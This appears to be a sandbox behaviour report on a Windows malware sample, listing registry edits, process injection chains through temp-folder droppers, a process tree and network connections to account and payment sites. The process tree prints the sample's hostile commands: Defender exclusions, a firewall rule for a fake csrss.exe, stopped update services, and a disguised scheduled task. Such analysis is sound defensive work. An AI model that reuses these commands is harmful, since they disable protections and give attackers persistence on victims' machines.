Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2704 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe
PID 2704 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe
PID 2704 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe
PID 2748 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe
PID 2748 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe
PID 2748 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe
PID 3444 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe
PID 3444 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe
PID 3444 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe
PID 1020 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe
PID 1020 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe
PID 1020 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe
PID 1020 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe
PID 1020 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe
PID 1020 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3444 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe
PID 3444 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe
PID 3444 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe
PID 4812 wrote to memory of 3060 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4812 wrote to memory of 3060 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

Processes

C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe

"C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sm756gN.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sm756gN.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dc5kt9.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dc5kt9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\7078.exe

C:\Users\Admin\AppData\Local\Temp\7078.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\A024.exe

C:\Users\Admin\AppData\Local\Temp\A024.exe

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1064.exe

C:\Users\Admin\AppData\Local\Temp\1064.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\6D2B.exe

C:\Users\Admin\AppData\Local\Temp\6D2B.exe

C:\Users\Admin\AppData\Local\Temp\7143.exe

C:\Users\Admin\AppData\Local\Temp\7143.exe

C:\Users\Admin\AppData\Local\Temp\73F4.exe

C:\Users\Admin\AppData\Local\Temp\73F4.exe

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\ttdegdw

C:\Users\Admin\AppData\Roaming\ttdegdw

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 twitter.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
JP 23.207.106.113:443 steamcommunity.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 store.cloudflare.steamstatic.com udp
US 8.8.8.8:53 community.cloudflare.steamstatic.com udp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 34.202.40.65:443 www.epicgames.com tcp
US 34.202.40.65:443 www.epicgames.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 151.101.1.21:443 www.paypal.com tcp
US 151.101.1.21:443 www.paypal.com tcp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 151.145.64.172.in-addr.arpa udp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 65.40.202.34.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
US 157.240.5.35:443 facebook.com tcp
US 157.240.5.35:443 facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 186.15.239.18.in-addr.arpa udp
